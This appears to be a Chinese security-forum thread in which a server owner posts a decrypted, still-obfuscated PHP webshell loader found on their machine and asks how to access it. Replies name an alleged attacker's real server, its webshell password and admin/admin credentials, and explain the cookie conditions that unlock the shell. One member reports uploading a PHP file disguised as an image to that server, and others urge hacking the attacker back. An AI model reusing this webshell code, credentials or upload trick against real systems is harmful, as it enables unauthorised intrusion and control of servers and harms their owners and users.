能力值:
( LV2,RANK:10 )
|
-
-
2 楼
<?php
/* 本程序由 Ranyun_JieMi_EnphpV1 3.0算法解密 */
?><?php
/* -- mzphp 混淆加密:https://git.oschina.net/mz/mzphp2 */
error_reporting(E_ALL ^ E_NOTICE);
error_reporting(E_ERROR | E_PARSE);
@set_time_limit(0);
header('content-Type: text/html; charset=gb2312');
if (isset($_COOKIE['PHPSSESID']) == !1) {
exit;
}
$c = 'ch' . 'r';
$b = $c(98) . $c(97) . $c(115) . $c(101) . $c(54) . $c(52) . $c(95) . 'd' . $c(101) . $c(99) . $c(111) . $c(100) . $c(101);
$r = $b('cHJlZ19yZXBsYWNl');
$f = $b('Y3JlYXRlX2Z1bmN0aW9u');
if ($_COOKIE['PHPSSESID'] == $b('c3dhbg==')) {
$html = $b('JHBhc3N3b3JkPSdzd2FuJzs=') . '@e#html' . $c(118) . $c(97) . $b('bChnemluZmxhdGUo') . $b . '("jVRpb9pAEP0eKf9hY6HYlmi4EqQWWUrUOhSlmOCDFKrKWuwBr7J4Xe9Sjor/3jWQYA617Bdr53jz5u2MIU1Z6qeQsFSQeKyV9cblRQQ4hFRTAhYLiMUHd5HAJyRgLkqRmNAGCiKcchDGeFitVapKlsOBc8JinwucCi2zkBHSrgiXcVrBd0zHaXWsH0oSJRyY8lPX0Z/LCyRPIUAGUtXG9jblkOKxLJtZ22xJKMWl25sy0gI2SbAgQwoN1HZaJqrflBvohcQhm3FkuejupqrvcFIqEYaYQ/3WDyFgIWj7N6XvRU67aZnD2qDdrnaXg6+vFfxi93Et7PTMctltVjqhN69738NOd9mb9nvh4LlrGIqu56pYMDOQUkpeP/56erJILVkMyKSkbCPWKnCRJoxrhaD4lqGj62s0msaByESDOeGCa2ognT6JiVD/4Yc5BOpOvo2Ekez1PVt7o5edtVU+AkvkOwRREX327G+dZ9eXnw2ds6LdVtvseG4RVe7OirdN17Mt136wnEfTLiLX9szzaDmm/dA0LbeYm4V85npe3pXIko9wA8o45D2r/z+GFM4fy1lVMaVs5mcwI5ZAfCi1gEnCJYP7EaGyxoF+6woyQiy0TaSu75zv7O/JJKHZCKpqcYt4BJKjqYRAv5D0IQ4fZU3lNGRGJ2vA324t3+OWE+BU/1eGgUaYctjv9XhtZaXxksQjisXhOhUCPVdttfkBnLH/8BvTkxESbPUX' . $b('IikpKTs7');
$e = @$f('', $r('/#html/', '', $html));
$e();
} else {
$html = '@e#html' . $c(118) . $c(97) . $b('bChnemluZmxhdGUo') . $b . '("c0gtS8zRSK/KzEvLSSxJ1UhKLE41M4lPSU3OT0nVUIl39vf39nSNVg/wCAgOdg32dFGP1dTUtAYA' . $b('IikpKTs7');
$e = @$f('', $r('/#html/', '', $html));
$e();
}
exit; 这是我解密的php大马,但是这个大马要怎么访问啊,我传服务器不能访问
|
能力值:
( LV1,RANK:40 )
|
-
-
3 楼
wx_三五瓶
<?php
/* 本程序由 Ranyun_JieMi_EnphpV1 3.0算法解密 */
?> ...
后缀改.php,找个测试服务器看看。
|
能力值:
( LV2,RANK:10 )
|
-
-
4 楼
6otest
后缀改.php,找个测试服务器看看。
我改了的不能访问
|
能力值:
( LV13,RANK:400 )
|
-
-
5 楼
黑客的服务器:http://www.buy0538.cn/ webshell访问密码:swan
|
能力值:
( LV2,RANK:10 )
|
-
-
6 楼
wmsuper
黑客的服务器:http://www.buy0538.cn/
webshell访问密码:swan
他webshell的密码存在http://www.buy0538.cn/web/
|
能力值:
( LV2,RANK:10 )
|
-
-
7 楼
服务器里安装了收钱吧是弱密码,密码和账号都是admin
|
能力值:
( LV2,RANK:10 )
|
-
-
8 楼
wmsuper
黑客的服务器:http://www.buy0538.cn/
webshell访问密码:swan
这个服务器疑似也是被黑客入侵的
|
能力值:
( LV13,RANK:400 )
|
-
-
9 楼
大佬来个直播日黑客服务器呗
|
能力值:
( LV2,RANK:10 )
|
-
-
10 楼
wmsuper
黑客的服务器:http://www.buy0538.cn/
webshell访问密码:swan
老哥他的webshell怎么访问?
|
能力值:
( LV2,RANK:10 )
|
-
-
11 楼
EX呵呵
服务器里安装了收钱吧是弱密码,密码和账号都是admin
老哥能查出我服务器他怎么入侵的吗
|
能力值:
( LV2,RANK:10 )
|
-
-
12 楼
wx_三五瓶
老哥能查出我服务器他怎么入侵的吗
bzd呀那个收钱吧里的上传点不知道为什么传不上去文件
|
能力值:
( LV2,RANK:10 )
|
-
-
13 楼
EX呵呵
bzd呀那个收钱吧里的上传点不知道为什么传不上去文件
bzd什么意思? 我这种源码他好像都能入侵,你知道漏洞在哪吗,我日志都上传了
|
能力值:
( LV13,RANK:400 )
|
-
-
14 楼
wx_三五瓶
老哥他的webshell怎么访问?
条件一: if ($_COOKIE['PHPSSESID'] ==‘swan’) 条件二: $password='swan'; define('envlpass',$password); $_COOKIE['envlpass'] == md5(envlpass)
|
能力值:
( LV2,RANK:10 )
|
-
-
15 楼
他这个是大马吧
|
能力值:
( LV2,RANK:10 )
|
-
-
16 楼
wx_三五瓶
老哥能查出我服务器他怎么入侵的吗
应该是把php马伪装成图片上传
|
能力值:
( LV2,RANK:10 )
|
-
-
17 楼
但是他怎么解析的啊,我把服务器里面的马删了,给打包在云盘 链接在上面 日志也在
|
能力值:
( LV13,RANK:400 )
|
-
-
18 楼
wx_三五瓶
他这个是大马吧
小马下载大马,小马下载大马的触发条件是条件一,大马进去的条件是二
|
能力值:
( LV2,RANK:10 )
|
-
-
19 楼
我觉得可以试试用他的木马对付他自己
|
能力值:
( LV2,RANK:10 )
|
-
-
20 楼
wmsuper
小马下载大马,小马下载大马的触发条件是条件一,大马进去的条件是二
老哥能从我的日志看出来 我的漏洞在哪吗?
|
能力值:
( LV2,RANK:10 )
|
-
-
21 楼
EX呵呵
我觉得可以试试用他的木马对付他自己
对付他都没意思,我想知道我漏洞在哪
|
能力值:
( LV2,RANK:10 )
|
-
-
22 楼
wmsuper
条件一:
if ($_COOKIE['PHPSSESID'] ==‘swan’)
条件二:
$password='swan';
define('envlpass',$password) ...
图片(php)上传成功了 http://www.buy0538.cn/pay/uploads/20200823202925.jpg
|
能力值:
( LV2,RANK:10 )
|
-
-
23 楼
EX呵呵
图片(php)上传成功了 http://www.buy0538.cn/pay/uploads/20200823202925.jpg
老哥 传成功了,是图片你怎么运行喃
|
能力值:
( LV2,RANK:10 )
|
-
-
24 楼
wx_三五瓶
对付他都没意思,我想知道我漏洞在哪
图片上传(把php伪装成图片上传)
|
能力值:
( LV2,RANK:10 )
|
-
-
25 楼
EX呵呵
图片上传(把php伪装成图片上传)
他上传都是直接上传的图片马,但是他怎么运行的
|
|
|